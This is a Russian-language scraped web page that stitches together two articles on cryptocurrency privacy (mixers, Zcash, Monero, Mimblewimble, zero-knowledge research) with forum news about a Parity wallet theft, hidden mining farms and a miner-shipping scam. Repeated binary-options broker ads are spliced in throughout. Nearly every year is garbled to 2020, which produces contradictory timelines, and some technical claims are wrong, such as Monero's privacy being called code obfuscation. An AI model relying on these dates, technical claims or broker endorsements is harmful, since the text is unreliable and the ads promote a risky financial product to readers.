Анонимность криптовалют под ударом

Рейтинг самых лучших брокеров бинарных опционов 2020:
  • Бинариум
    Бинариум

    1 место в рейтинге! Самый честный и надежный брокер бинарных опционов!
    Идеально подходит для новичков и средне-опытных трейдеров.
    Бесплатное обучение и демо-счет!
    Дают бонус за регистрацию:

Анонимность криптовалюты, какие монеты действительно обеспечивают приватность?

Приватность – важная тема в области криптовалюты. Ни компании, ни частные лица не хотят предавать огласке в публичном блокчейне всю свою информацию, которая может быть свободно, без каких-либо ограничений, прочитана местным или иностранным правительством, членами семьи, коллегами или конкурентами.

“Я рассматриваю приватность как способ пресечь рост опасений касательно любой нашей активности и создать сферы, которые мы вольны оптимизировать в интересах нашего собственного счастья – и только его! – не задумываясь о мнении других людей”, — Виталик Бутерин.

На данный момент ведется множество экспериментов и исследований различных подходов достижения приватности в блокчейнах, но достаточно обстоятельного обзора этой проблемы до сих пор представлено не было.

В этой статье мы обсудим последние эксперименты и исследования приватности в четырех областях:

  • приватные коины,
  • приватность смарт-контрактов,
  • инфраструктура приватности,
  • исследование приватности.

Навигация по материалу:

Приватность (или ее отсутствие) в Биткоине

Биткоин был изначально разработан как псевдонимная (в отличие от анонимной) криптовалюта, которая поддерживала приватность пользователей лишь постольку, поскольку не было возможности связать сущности реального мира с адресами в сети Биткоина.

Однако, вследствие публичной природы блокчейна Биткоина, быстро стало ясно, что можно идентифицировать пользователей на основе закономерностей использования ими определенных адресов и соответствующих транзакций. Кроме того, узлы сети, распространяя информацию о транзакциях, раскрывают даже IP-адреса.

Каждый узел представляет адрес, а каждая линия – транзакцию. Многие узлы, такие как Mt. Gox, Silk Road и Satoshi Dice, были деанонимизированы на основе закономерностей проводимых ими транзакций.

Рейтинг брокеров бинарных опционов полностью на русском языке:
  • Бинариум
    Бинариум

    1 место в рейтинге! Самый честный и надежный брокер бинарных опционов!
    Идеально подходит для новичков и средне-опытных трейдеров.
    Бесплатное обучение и демо-счет!
    Дают бонус за регистрацию:

В 2020 году Сара Мейклджон и др. успешно идентифицировали кластеры, принадлежащие онлайн-кошелькам, продавцам и поставщикам других услуг. Сегодня сервисы вроде Chainalysis и Elliptic деанонимизируют блокчейны с целью обнаружения случаев отмывания денег, мошенничества и нарушения правил пользования.

В этом примере наблюдатель может видеть, что группа отправила биткоины группе , однако не в состоянии точно определить, кем и кому именно были направлены средства. Если повторить этот процесс несколько раз с разными пользователями, то общая анонимность повысится.

В ответ на снижение уровня приватности Биткоина были созданы сервисы так называемого микширования криптовалют вроде CoinJoin, чтобы повысить анонимность при использовании блокчейна.

В CoinJoin пользователи совместно создают транзакции, которые перемешивают принадлежащую им валюту, что анонимизирует пользователя в пределах данного набора коинов. Этот процесс затем повторяется между разными пользователями, чтобы повысить общую анонимность участников. Подобные сервисы микширования исторически использовались в преступных целях, чтобы смешать идентифицируемые биткоины с другими средствами и затруднить отслеживание их первичного источника.

И все же у CoinJoin есть и недостатки. Приватность здесь достигается за счет крупного размера «анонимного множества» (anonymity set) коинов. Но на практике в средней транзакции CoinJoin участвуют всего 2–4 пользователя, что позволяет деанонимизировать 67% транзакций CoinJoin. Дальнейшие улучшения этого сервиса вдохновили на создание более совершенных «микшеров» – как, например, TumbleBit – однако и у них есть свои ограничения.

Приватные коины

Ввиду недостатка приватности в Биткоине и отсутствия каких-либо планов по ее повышению на уровне протокола в обозримом будущем, появилось несколько новых криптовалют, нацеленных на поддержку анонимных транзакций.

Zcash создана сильной командой ученых-криптографов с использованием технологии zk-SNARK. Первоначальную прорывную идею доказательства с нулевым знанием предложили в 1985 году Гольдвассер, Микали и Ракофф. Технология zk-SNARK, разработанная Элаем Бен-Сассоном и другими в 2020 году – это улучшение доказательств с нулевым знанием, позволяющее сжато и неинтерактивно доказать, что вы знаете нечто, не раскрывая, что именно. zk-SNARK лежит в основе многих связанных с приватностью проектов и может также уменьшить размеры блокчейнов с использованием техники рекурсивной композиции.

На данный момент команда Zcash работает над Sapling, улучшением сети, которое повысит производительность и функциональность защищенных (зашифрованных) транзакций и релиз которого намечен на октябрь 2020 года. Создание зашифрованных транзакций требует больших вычислительных затрат – и около 85% транзакций Zcash все еще отправляются открыто. Sapling, как ожидается, повысит число защищенных транзакций.

Monero – еще один приватный коин, вместо zk-SNARK использующий кольцевые подписи. На данный момент команда Monero работает над технологией Kovri, которая позволит задействовать маршрутизацию пакетов, чтобы пользователи могли скрывать свое географическое положение и IP-адреса и таким образом сохранять приватность. Анонимизация сетевого трафика пользователей значительно повысит безопасность сети Monero, защитив ее пользователей от арестов или потенциального физического вреда.

Zcash и Monero часто сравнивают. Оба сообщества возглавляют чрезвычайно популярные в криптотвиттере персонажи – Зуко Уилкокс в случае Zcash и Рикардо «fluffypony» Спагни в случае Monero. Однако если Zcash поддерживается собственной компанией и фондом, то Monero может похвастаться лишь органическим сообществом ключевых разработчиков. В обеих сетях были обнаружены уязвимости, позволявшие идентифицировать пользователей – исследователи смогли связать с основателями или майнерами 69% защищенных транзакций Zcash и деанонимизировать 62% процента всех транзакций Monero – однако позже они были устранены.

И все же оба проекта изначально используют очень разные подходы к приватности – в результате чего различны и компромиссы, на которые они вынуждены идти – и пока что не произошло ничего, что ясно показало бы преимущество одного проекта перед другим в долгосрочной перспективе. По моему мнению, Zcash и Monero продолжат сосуществовать, как «Кока-кола» и «Пепси».

Mimblewimble – это новый блокчейн-проект, созданный на основе дизайна Биткоина и ориентированный на приватность пользователей. 9 июля 2020 года некто под псевдонимом Tom Elvis Jedusor опубликовал его whitepaper в исследовательском канале Биткоина и исчез. Позже некий Ignotus Peverell запустил Github-проект под названием Grin и начал реализацию Mimblewimble. Сотрудник Blockstream Эндрю Поэлстра представил проект на конференции BPASE 2020 года в Стэнфорде, после чего Grin начал активно набирать популярность. Уже выпущена третья тестовая версия сети, а основной релиз ожидается в начале 2020.

Mimblewimble/Grin – это улучшение конфиденциальных транзакций и идеи CoinJoin на основе Bitcoin. Среди ключевых особенностей проекта – отсутствие публичных адресов, полная приватность и малые размеры блокчейна. В последнее время многие с энтузиазмом обсуждают майнинг Grin, ведь Grin-коины, как и биткоины, можно создавать только на основе PoW (доказательства работы). Grin использует алгоритм Cuckoo Cycle, разработанный для защиты от ASIC-майнинга и предотвращения централизации майнинга, как в Monero.

В целом, Grin объединяет социально привлекательные особенности, которые придают такую мощь Биткоину – анонимного создателя, команду разработчиков без лидера, PoW-консенсус, отсутствие ICO и каких либо жестко закодированных в протокол средств управления блокчейном, – с техническими улучшениями наподобие тех, что используются в Zcash и Monero.

Однако, в отличие от Биткоина, общий объем эмиссии Grin-коинов не ограничен, а их монетарная политика представляет собой линейный график выпуска коинов. Это значит, что инфляция очень высока в начале майнинга, но со временем постепенно стремится к нулю (не достигая его). В то же время ранняя инфляция поощряет расходование коинов, а не спекуляцию ими после запуска криптовалюты. И хотя такая «вечная» инфляция делает Grin не лучшим активом для инвестиций, она позволяет избежать нестабильности Биткоина, которая наступит, когда майнеры перестанут получать вознаграждение за блоки и смогут рассчитывать только на комиссии за транзакции.

Подобная монетарная политика позволяет также избежать спорной идеи «вознаграждения для основателя» (Founder’s reward), когда в течение 4 лет 20% созданных токенов ZEC выплачиваются разработчикам проекта. Наконец, размер блокчейна MimbleWimble масштабируется пропорционально числу пользователей, а не числу транзакций, что также решает проблему масштабирования массива UTXO, свойственную использующей кольцевые подписи Monero.

Среди других интересных приватных коинов, пока еще находящихся на раннем этапе разработки, можно выделить MobileCoin и BEAM.

Приватность в смарт-контрактах

Приватность в смарт-контрактах отличается от приватности платежей, поскольку смарт-контракты содержат публично доступный программный код. К сожалению, обфускация такой программы объективно невозможна, в результате чего смарт-контрактам в их текущем виде недостает и конфиденциальности (сокрытия сумм к оплате), и анонимности (сокрытия идентификационных данных отправителей и получателей).

Я убежден, что спрос на приватность смарт-контрактов возрастет, когда корпорации будут готовы к построению крупномасштабных децентрализованных приложений и осознают необходимость сокрытия активности своих клиентов.

Сейчас никого особо не волнует публичная доступность данных об использовании децентрализованных приложений вроде CryptoKitties. Эта ситуация похожа на ту, что имела место во времена зарождения интернета, когда базовые сайты использовали протокол HTTP, и только позже был разработан HTTPS, позволявший шифровать траффик и использовать веб для целей вроде электронной коммерции.

Поскольку в Ethereum приватность отсутствует, статистика использования децентрализованных приложений доступна всем желающим на DappRadar.

В случае с Ethereum мы имеем проект Zether Бенедикта Бюнца из Стэнфорда – полностью совместимый с Ethereum механизм приватных платежей, обеспечивающий и конфиденциальность, и анонимность смарт-контрактов. Zether будет сам реализован в качестве смарт-контракта в Ethereum и потреблять минимальный объем газа. Это гибкий инструмент, позволяющий гарантировать приватность многих приложений – например, платежных каналов.

Keep – еще один проект создания своего рода «слоя приватности» для Ethereum, использующий для приватных данных находящиеся вне цепочки контейнеры. Такой подход также позволяет управлять приватными данными и использовать их без раскрытия в блокчейне.

И хотя на данный момент приватность занимает второе место по приоритетности после Casper, Ethereum Foundation медлит и с реализацией последнего, а значит, есть риск, что нам еще долго придется ждать в Ethereum приватности «по умолчанию». Если же крипто-сообщество в ближайшее время начнет испытывать острую потребность в приватности смарт-контрактов, то этот вакуум заполнят вновь появившиеся платформы с поддержкой смарт-контрактов – как Zcash и Monero сделали это с приватными платежами, которых не было в Биткоине. Подобные платформы – как, например, Enigma, Origo и Covalent – уже пытаются обеспечить нативную приватность своих блокчейнов.

Другой интересный связанный с приватностью проект принадлежит Oasis Labs. Они строят Ekiden – новую платформу смарт-контрактов, которая отделяет исполнение контрактов от механизма консенсуса. Смарт-контракты выполняются внутри изолированного аппаратного обеспечения (например, Intel SGX), которое называется «безопасный анклав» (secure enclave).

Данный анклав действует подобно «черному ящику», сохраняя вычисления в тайне от других приложений. Он также генерирует криптографическое доказательство того, что программа была выполнена корректно, и данное доказательство затем сохраняется в блокчейне. Благодаря разделению выполнения контрактов и консенсуса, Ekiden оказывается совместим с различными блокчейнами, в том числе и с Ethereum.

Инфраструктура приватности

В дополнение к приватным коинам и смарт-контрактам, существуют и другие важные проекты приватности для стека Web 3, о которых также стоит упомянуть.

Orchid – это попытка построить улучшенную версию Tor, в которой пользователи получают токены, сдавая в аренду свою пропускную способность и выступая как ретрансляторы внутри сети Orchid. Проблема Tor в том, что существует лишь около 6000 узлов-ретрансляторов и менее 2000 «мостов», так что то же правительство Китая может легко внести все ретрансляторы и мосты в черный список, таким образом отрезав своим гражданам доступ к сети Tor.

Использование экономики на основе токенов будет побуждать большее количество людей становиться ретрансляторами, а значит, сеть Orhid будет труднее заблокировать, не заблокировав при этом также и значительный процент всего мирового интернета.

BOLT строят канал приватных платежей, который использует слепые подписи и доказательства с нулевым знанием, чтобы сокрыть информацию об участниках, когда те открывают каналы, перемещают по ним средства и закрывают их. Первые такие каналы строятся поверх Zcash, но будут позволять взаимодействовать также с Биткоином и Эфириумом.

NuCypher строят децентрализованную систему управления ключами, использующую технологию прокси-решифрования для предоставления той же функциональности, что и HTTPS. Прокси-решифрование – это тип шифрования публичного ключа, позволяющий трансформировать ключи шифрования из одного публичного ключа в другой, ничего не узнавая при этом из шифруемого сообщения.

Starkware реализует zkSTARK в различных блокчейнах, включая Ethereum. Преимущество технологии zk-STARK перед zk-SNARK в том, что она не требует доверия к существующей сети, хотя криптографические доказательства становятся намного объемнее.

Исследование приватности

Именно исследование криптографии на академическом уровне порождает инновации в области приватности. Исследование самой приватности в основном касается нулевого знания, многосторонних вычислений и полностью гомоморфного шифрования.

В дополнение к zk-SNARK и zk-STARK, мы имеем Bulletproof – новую форму коротких неинтерактивных доказательств с нулевым знанием. Как и zk-STARK, Bulletproof не нуждаются в доверии к существующей сети, однако проверка таких доказательств требует больше времени, чем zk-SNARK.

Доказательства Bulletproof разработаны таким образом, чтобы обеспечивать эффективные конфиденциальные транзакции криптовалют, при этом уменьшая размер доказательств с 10 Кб до 1–2 Кб. Если бы все накопившиеся транзакции в Биткоине были конфиденциальны и использовали Bulletproof, общий размер массива UTXO составил бы всего 17 Гб – по сравнению со 160 Гб при используемых сейчас доказательствах.

Уступки, неизбежные при использовании различных систем доказательства с нулевым знанием.

Многосторонние вычисления позволяют группе людей совместно производить вычисление некой функции со своими входными данными, при котором каждый из них не вынужден раскрывать эти данные. Например, Алиса и Боб могли бы узнать, кому принадлежит больше биткоинов, без необходимости раскрывать, сколько именно биткоинов принадлежит каждому из них. К сожалению, на данный момент главным ограничением многосторонних вычислений является их чрезвычайная неэффективность на практике.

Полностью гомоморфное шифрование позволяет производить вычисления на зашифрованных данных. В течение нескольких десятилетий эта проблема оставалась открытой, пока в 2009 году Крейг Джентри, доктор наук из Стэнфорда, не построил первую схему гомоморфного шифрования на основе решеток.

Примером применения данной технологии может быть ситуация, когда Боб хочет выполнить некие вычисления, например, настройку модели машинного обучения, на данных Алисы, причем Алиса не хочет раскрывать свои исходные текстовые данные. Полностью гомоморфное шифрование, как и многосторонние вычисления, все еще остается весьма теоретической областью и слишком неэффективно для использования на практике.

Что же в итоге?

В целом, приватность – одна из наиболее интересных областей нынешних криптографических исследований, и еще многое предстоит сделать с точки зрения оптимизации, чтобы эти теоретические техники стали достаточно эффективны для реального практического применения.

Исследовательские лаборатории, такие как Стэнфордский центр исследования блокчейна, активно движутся вперед в этом направлении, и будет очень любопытно увидеть, какие прорывы ожидают нас в ближайшие годы.

Преимущество криптовалют в том, что они позволяют напрямую применять новейшие наработки в плате приватности. Многие техники обеспечения приватности, используемые в коинах, смарт-контрактах и инфраструктуре, были изобретены лишь несколько лет назад. Учитывая, как быстро развивается эта область, приватность данных и действий пользователей продолжит становиться все более неотъемлемой составляющей криптопроектов.

Анонимность криптовалют — реальность или миф?

Криптовалюта обратила на себя внимание, в первую очередь, как на средство анонимного платежа. Многие пользователи, которые ценят свои права и личные свободы, купились на эту самую анонимность, не до конца понимая, что криптовалюта раскрывает намного больше данных, чем фиатные валюты. Неужели цифровые деньги не способны хранить тайны транзакций и выдают своих пользователей с поличным? Большинство монет именно так и делает, но есть и другие криптовалюты, которые ценят наше с вами личное пространство и безопасность. О тех и других мы и поговорим в этой статье.

Что такое псевдоанонимность криптовалют?

Сатоши Накамото ни капельки не обманул нас, сказав, что биткоин – анонимная валюта. В то же время, создатель первой крипты допустил роковую неточность в своем определении и имел в виду совсем не то, что за биткоины можно покупать наркотики и оружие, и за это вам ничего не будет. Под анонимностью имелось в виду лишь отсутствие необходимости в предоставлении каких-либо данных о себе. Говоря простым языком, в процессе покупки биткоинов от вас не потребуют паспорт, предоставление адреса прописки и декларации о доходах. Тем не менее, сама суть криптовалюты влечет за собой деанонимизацию пользователей.

Криптовалюты работают на блокчейне, который представляет собой базу данных. В этой базе можно просматривать операции абсолютно любого пользователя, и не нужно быть финансовым гением, чтобы проследить цепочку транзакций и узнать откуда, куда и сколько монет были отправлены. Если пользователь не проявит осторожность, то вся информация о нем может быть раскрыта. Для этого достаточно совершить покупку в интернет-магазине и оплатить счет биткоинами или банально вывести средства с биржи в офлайн.

По сути имеем следующее – криптовалюта анонимна до тех пор, пока пользователь сам себя не выдаст. То есть по факту анонимность есть, но ее как бы и нет. К счастью, на смену поколению псевдоанонимных монет пришли анонимные криптовалюты, о которых вы обязательно узнаете далее, ну а пока разберемся нужна ли нам анонимность в сети или может это не так уж важно?

Зачем анонимность пользователю криптовалют?

Многие считают анонимность в финансовых операциях чем-то не столь важным, и очень зря. С одной стороны, мы привыкли жить в централизованном, бюрократическом мире и то, что вся наша жизнедеятельность находится под чьим-то неусыпным контролем так же никого не удивляет. Но хорошего здесь мало, ведь такое положение вещей всячески ущемляет нас, а порой даже вредит не только благосостоянию, но и жизни. Что хорошего в том, что любой злоумышленник может навести справки о вашем материальном положении и обогатиться за ваш счет?

Даже если мы не занимаемся отмыванием денег, продажей запрещенных веществ и прочими нелегальными махинациями, то это вовсе не значит, что можно себя деанонимизировать и спать спокойно. Сегодня каждый разумный человек должен стремиться к свободе во всех смыслах, и финансовой в первую очередь. В конце концов, это залог безопасности.

Основательно о безопасности личных данных в сети заговорили после череды арестов тех, кто не очень честным путем, зарабатывал посредством биткоинов. Общественность осознала, что никто не застрахован от наблюдений за операциями в сети Биткоин и, возможно, уже завтра ваша транзакция на несколько биткоинов кому-то покажется подозрительной. Не забывайте и о том, что по сети гуляют так называемые грязные биткоины, которые имеют отношения к кражам на биржах, покупке наркотиков и т.д. Кто знает, быть может, монеты из этого списка уже в вашем кошельке?

Анонимные криптовалюты

Разработчики монет последнего поколения пришли к тому, что насущную проблему псевдоанонимности в криптовалютном мире необходимо решать. Это стало для них отличным поводом в чем-то превзойти биткоин и началась настоящая «гонка вооружений». Сегодня можно констатировать появление сразу нескольких популярных валют, в разработке которых анонимности было уделено особое внимание.

Monero

Монета, выпущенная в 2020 году, громко заявила о себе тем, что является анонимной и, наверное, поэтому вошла в ТОП по капитализации. Сегодня за Монеро закрепилось 9-е место в рейтинге криптовалют и ее активно используют для конфиденциальных транзакций. В отличие от биткоина, у которого и код, и операции пользователей видны, как на ладони, Monero имеет в своей основе систему обфускации, то есть запутывания кода. Это основательно усложняет анализ кода, но никак не влияет на его функциональность.

Тем не менее, нельзя назвать криптовалюту Монеро полностью анонимной. Информация о транзакциях записывается в блокчейн, хоть и в искаженном виде, что позволяет при наличии мощностей частично деанонимизировать некоторые операции. Это маловероятно, ведь злоумышленник должен контролировать значительную часть сети, но факт остается фактом.

Darkcoin, XCoin, Dash – названия одной и той же криптовалюты, которая ориентирована на анонимность транзакций и использует механизм Darksend. Суть его сводится к тому, что в блокчейне записывается информация о транзакциях, но пользователь может выбрать опцию смешивания и ее интенсивность – ваши монеты могут быть смешаны с монетами других пользователей до 8 раз, а если и этого вам покажется мало, то можно повторить операцию еще раз. В целом, такая схема вполне рабочая и дает необходимую конфиденциальность, но, чисто теоретически, вычислить цепочку транзакций возможно, ведь информация о них в блокчейне имеется, хоть и в запутанном виде.

Zcash

Совсем молодая монета под названием Zcash является первой по-настоящему анонимной криптовалютой. Если в вышеописанных вариантах данные об платежах попадают в блокчейн, то в случае с Zcash эта информация остается неразглашенной. Появилась на свет монета совсем случайно, ведь изначально, не планировалось создание новой криптовалюты, а лишь дополнение к биткоину, которое позволяло бы совершать полностью анонимные операции на основе протокола ZeroCash. Этот самый протокол предлагал нулевое разглашение о транзакции, что и стало основой для анонимной денежной единицы.

Протокол, на основе которого работает Zcash, содержит гениальную в своей простоте математическую концепцию. Она сводится к тому, что для подтверждения транзакции достаточно знать, что она была, остальные данные о ней разглашаться не должны. В итоге, блокчейн Zcash имеет отпечаток того, что в сети был осуществлен платеж, но информация о том, сколько монет, откуда и куда они шли, не предоставляется. Таким образом имеем полную анонимность, которая даже гипотетически не может выдать какую-то информацию – ее попросту нет.

Как сохранить анонимность в сети Биткоин?

Рынок криптовалют расширяется, появляются более конфиденциальные монеты, но что же делать тем, кто и дальше хочет иметь дело только с биткоином и не признает его собратьев? Выход есть, более того, только от вас зависит насколько анонимными будут ваши операции. Чтобы защитить свои персональные данные и не стать жертвой злоумышленников или федеральных органов, следуйте таким правилам:

  • При операциях с биткоинами, используйте TOR и другие сервисы, позволяющие скрыть ваш IP-адрес.
  • Для каждой транзакции создавайте отдельный биткоин-адрес – это усложнит идентификацию личности, да и высчитать количество монет в вашем владении будет невозможно.
  • Используйте биткоин-миксеры, которые перемешивают средства своих пользователей за небольшую комиссию. Найти «ваши» монеты после такого перемешивания будет крайне сложно, но есть риск нарваться на недобросовестный сервис, который может попросту присвоить себе ваши деньги.
  • Если хотите быть анонимными, то лучше не расплачиваться битками в интернет магазинах, которые требуют личных данных (например, в случае доставки приобретенного товара почтой). В таком случае лучше отдать предпочтение фиатным деньгам, и ваша анонимность в сети биткоин останется в целости и сохранности.

Криптовалюта хоть и ударила лицом в грязь, оказавшись не такой анонимной как это предполагалось, но есть масса возможностей сохранить свои данные неприкосновенными при ее использовании. Если вы не хотите отдавать предпочтение более анонимным валютам, чем биткоин, то вполне реально сохранить в тайне информацию о себе, проявив осторожность, которая никогда не будет лишней.

Криптовалюты под ударом хакеров: с Ethereum-кошельков украдено $30 миллионов

Мир переживает криптовалютный бум, майнят все — от мала до велика. Хакеры тоже всерьез занялись «добычей криптовалют» — только своим способом. Ряд источников сообщали, что в минувшую среду с Ethereum-кошельков была украдена криптовалюта на сумму 30 миллионов долларов, причем всего через два дня после того, как другая хакерская группа украла 7,4 миллиона долларов.

Согласно сообщению основателя Parity (клиента Ethereum) Гэвина Вуда в официальном канале «критическая» уязвимость в Parity привела к тому, что по меньшей мере три аккаунта были скомпрометированы хакерами, что привело к хищению в эквиваленте 31 725 019 долларов США.

Дубликаты не найдены

При чем косяк самих пользователей, мало кто думает о защите.

Хуй там. Уязвимость была в самом кошельке, и украли не у пользователей, а с ICO-кошельков.

Да я не о сумме, а о способе написания

Пруфы чего? Есть сомнения что на 1060 можно майнить? Сейчас 1060 дает 1.5 доллара в сутки, в мае июне давала 3.

Майнинговая ферма воровала на электричестве по 200 000 р. в месяц два года подряд в Москве в ресторане

«Огромная майнинговая ферма ценой в миллионы оказалась у нас в связи с тем, что два сотрудника договорились между собой и решили продавать-покупать биткоины и осуществлять это на рабочем месте.

То есть в подвальном помещении, где это можно сделать тайком, закрыть от постороннего глаза. Причем один из сотрудников 10 лет у меня работает, другой — пять. Электрик и IT. Жесткие диски, которые были при этой ферме, исходя из их данных, включены с 2020 года. Работала она почти до августа 2020 года. Это фактически подтверждается данными электросчетчика и нашей бухгалтерии. До включения этой фермы мы платили 500 тысяч в месяц, а после включения — 700», — рассказал «360» владелец ресторана Армен Арутюнян.

По словам ресторатора, ферму обнаружила его дочь. Когда бухгалтерия пожаловалась на перерасход электроэнергии, девушка стала искать возможный источник перерасхода. И в подвале, случайно отодвинув гипсокартонную стену, она нашла майнинговую ферму.

(по ссылке выше есть короткий видос, сюда не вставляется)

Как рассказал адвокат хозяина ресторана Евгений Скрипилев, ферма была установлена тайно, конспиративно. Предприятие ежемесячно терпело убытки на 200 тысяч рублей в месяц, пока ферма генерировала криптовалюту.

«Лефортовским отделением полиции изъята майнинговая ферма. В настоящее время мы ожидаем привлечения двух этих сотрудников уголовной ответственности», — поделился юрист.

По его словам, полиция уже четырежды отказывала в возбуждении уголовного дела. Однако прокуратура на стороне потерпевшего, и в результате решения об отказе были отменены. Теперь адвокат ожидает, что виновные будут наказаны, а владелец ресторана признан потерпевшим.

А вот один из участников конфликта все отрицает.

«Я ничего не устанавливал. Если вы получили информацию от хозяина ресторана Арутюняна, то вы со временем поймете, что он не совсем адекватный человек. Очень негативно начал эту тему развивать и хочет кого-то привлечь к ответственности уголовной. Он завалил жалобами прокуратуру, привел кучу адвокатов и все равно состава уголовного дела никто не нашел. Ему обидно, что ферму ему поставили», — объяснил IT-специалист.

В этой новости прекрасно всё!

— и аргументация айтишника («ему обидно, что ферму ему поставили»). а что электричество воровали на огромную сумму — это как? он от радости должен подпрыгивать?

— если воровали электричество по 200 тысяч в месяц целых два года — куда смотрит бухгалтерия, внутренний аудит? может там получше надо проверить все? может там искусственным освещением петрушку с укропом для ресторана выращивают без лицензии?

— ну и конечно удивили счета за электричество для ресторана. Пол-миллиона только за электричество, а там плюсом коммуналка и аренда либо расходы на налог на недвижимость. Не говоря уже о прочем. Сколько же он должен приносить, чтобы окупать весь этот праздник, чтобы быть рентабельным и годами не замечать воровство только электричества, не говоря уже о прочем?

Впечатляет

Крупнейшая в России майнинг-ферма в Братске, примерно в 5 км от Братской ГЭС. На площади 15,5 тысяч кв.м работает около 20 тысяч устройств общей мощностью более 25 МВт. Туда попали журналисты Bloomberg и пофоткали все изнутри.

В Китае предлагают запретить майнинг криптовалют, потому что это глупая трата энергии

Китайская национальная комиссия по развитию и реформе опубликовала документ, в котором помимо всего прочего предлагается запретить майнинг как «нежелательную» экономическую деятельность. Чиновники считают, что добыча криптовалют — это пустая трата ценных энергоресурсов. До 7 мая это предложение будет открыто для общественного обсуждения в Китае.

Согласно данным газеты South China Morning Post, добытчики криптовалюты облюбовали зависимые от угля регионы Синьцзян и Внутреннюю Монголию. Они выбирают их из-за довольно дешевого электричества. При этом 74% всех мощностей для криптомайнинга сосредоточено именно в Китае. А во всем мире загрязнения, связанные с добычей криптовалют, по разным оценкам, достигают от 3 до 5 млн тонн углекислого газа.

Согласно данным, опубликованным в журнале ScienceDirect, лишь майнинг криптовалюты Monero потребовал больше 30 Гигаватт-часов. Что в условиях Китая примерно равно 19 тысячам тонн выброшенного в атмосферу углекислого газа в период с апреля по декабрь 2020 года.

AMD: майнеры больше никому не нужны

Спрос на устройства для добычи цифровых денег пропал, сообщили представители крупной компании

AMD представила ежеквартальный отчет, в котором сообщается о рекордной прибыльности бизнеса за последние семь лет. За 2020 г. фирма заработала $6,48 млрд, в 2020 г. этот показатель был ниже — около $5,25 миллиардов. Представители компании рассказали, что в первом квартале текущего года доходы снизятся, отчасти из-за падения интереса к продукции со стороны майнеров цифровых денег.

«Снижение относительно того же квартала прошлого года объясняется перенасыщенностью каналов поставок, отсутствием выручки от продаж GPU в сфере блокчейна и снижением продаж памяти», — написали руководители AMD.

В октябре прошлого года глава компании Лиза Су предупредила, что спрос майнеров упадет в будущем. Тогда в AMD сообщили, что выручка от продаж видеокарт для добычи цифровых денег оказалась «ничтожной».

Самый крупный китайский развод на моей памяти

Занимаюсь доставкой из Китая, живу в Китае. И я представляю вашему вниманию самый крупный развод на моей памяти:

Был у меня клиент, возили разную электронику, объемы неплохие, все шло хорошо. Пока в прошлом году не случилась эта «золотая лихорадка» — надо брать биткоин, надо майнить!

Началось все с видеокарт летом, а к осени вовсю возили майнеры. Особенность доставки майнеров в том, что они очень дорогие, бОльшую часть стоимости доставки составляет страховка. Потерял груз, украли в пути — нужно возмещать клиенту всю стоимость. Большие деньги и большой риск. Каждый грузчик знал, что если тут майнеры — значит речь идёт о нескольких тысячах долларов за штуку. Надо пиздить!

Соответственно, только за страховку майнеров мы брали 6% от стоимости. Неплохие деньги. Но и потерять можно не мало, если товар пропадёт по пути.

Решил мой клиент тоже привезти в Россию майнеры. Начали разговаривать — я назвал стоимость доставки и страховки. Ну что-то он ни туда ни сюда, вроде дорого, давай дешевле. Я отказался.

Нашёл он надежную транспортную (Карго) в Шенчжене, знакомые советуют, канал на ютубе есть, русский парень там работает — вроде как можно верить. Ну ладно, его выбор.

Приехал в Китай, познакомился с поставщиками у которых майнеры в наличии, познакомился со своей новой Карго компанией, как полагается. Взял пробную партию — 10 штук. Заплатил биткоинами. А в то время (да и сейчас) многие поставщики в Шенчжене оплату биткоинами брали — с производителем нужно биткоинами рассчитываться.

Товар отдал в свою новую надежную транспортную, через две недели все в Москве, все отлично — схема работает, люди надежные, за страховку берут не 6%, как мы, а всего лишь 1%. Сэкономил.

Наступает ноябрь 2020, цены на криптовалюту растут, майнеры хрен найдёшь — разбирают как горячие пирожки. Раньше купишь — раньше начнёшь майнить.

Короче он подрывается, напрягается, находит деньги, берет кредиты, выводит из оборота, у друзей занимает — заказывает 100 майнеров. На сумму что-то около $350 000.

Звонит мне. Алексей, говорит, мы с тобой давно работаем, сумма большая, давай отвези майнеры, там 100 штук. Давай страховку хоть 2%? Я отказался, риск большой. Опять говорю — 6%.

Да ты там охренел, $20 000 с меня хочешь срубить, да с пустого места, да пошёл ты на хер! Ну и ладно, мне же спокойнее спать.

Платит он опять биткоинами поставщику. Договариваться на доставку, новая надежная транспортная — даёт добро, ждём товар.

Проходит три дня. Поставщик скидывает ему фотки — вот 100 штук, отгрузили, вот машина, вот фотка у склада твоей транспортной — все сделали.

Звонит в транспортную — товар они не получали. нет говорят, никто ничего не привозил.

Опять звонит поставщику — те говорят отвезли, вот бумажка типа — вот в ней кто-то расписался, товар приняли.

Звонит своему русскому парню, которой в этой Карго работает — получали товар? Нет, не получали.

Чья подпись на бумажке? Да хз чья, ничего не знаем.

Круг замкнулся, где майнеры — никто не знает.

Срывается прилетает в Китай. Идёт в транспортную — те сидят спокойно чай пьют — ничего не привозили. Пригоняет к поставщику — те тоже сидят чай попивают — все отгрузили вот бумажка, вот фотки. Причём фоток разгрузки нет.

Звонит мне и рассказывает всю эту историю. Приезжай говорит, пойдём в полицию, пошли весь город на уши поднимем, спиздили! Я не поехал, понятно что ничего там не добьёмся — с майнерами кидали направо и налево. Когда мы договаривались что я повезу — я обязательно указывал что лично поеду, лично загружу, партия большая. Оплати дорогу и тд — он же мне говорил что я охуел и ещё дорогу и гостиницу мне оплачивать.

Я живу в Иу, до Шенчженя ехать далеко, 1200 км, поэтому.

Потом звонил снова, рассказывал. Пошёл в полицию всё-таки. В Китае же камеры везде — можно доказать что угодно, куда машина ехала, разгружалась или нет и так далее.

Первое что его попросили — контракт, инвойс, факт оплаты и факт сделки доказать.

Как платил? — Биткоинами.

Где контракт? — Ну вот, в почте файл.

Понятно, всего вам доброго, до свидания, хорошего настроения, здоровья и держитесь там — вот краткий ответ полиции. Камеры смотреть нет оснований даже.

Факта сделки юридически не было. Потом звонил мне ещё много раз, просил бандитов каких найти, на ножи там всех поставить, истерика — но я же в триадах не состою, чем могу помочь? Ничем. Сэкономил? Молодец. $350 000 ушли в зрительный зал.

А клиент пропал. С весны не пишет, не звонит. Сотовый заблокирован, сайт не работает.

Пока писал, ещё три истории про кидалово с майнерами вспомнил, завтра напишу.

Бес попутал…

Иркутскэнерго уличило Церковь евангельских христиан “Благодать” в майнинге криптовалюты. Суд согласился с энергетиками и в этой связи повысил священникам стоимость электричества в три раза.

Церковь евангельских христиан “Благодать” занималось “майнингом” биткоинов, иначе никак нельзя объяснить высокие цифры потребления электроэнергии, решил арбитражный суд Иркутской области. Всего за один месяц церковь потребила более полумиллиона киловатт-часов энергии, в десять раз больше, чем иные приходы тратят за год. А с учетом того, что у священнослужителей был еще и оплаченный доступ в Интернет, суд сделал вывод: майнили крипту.
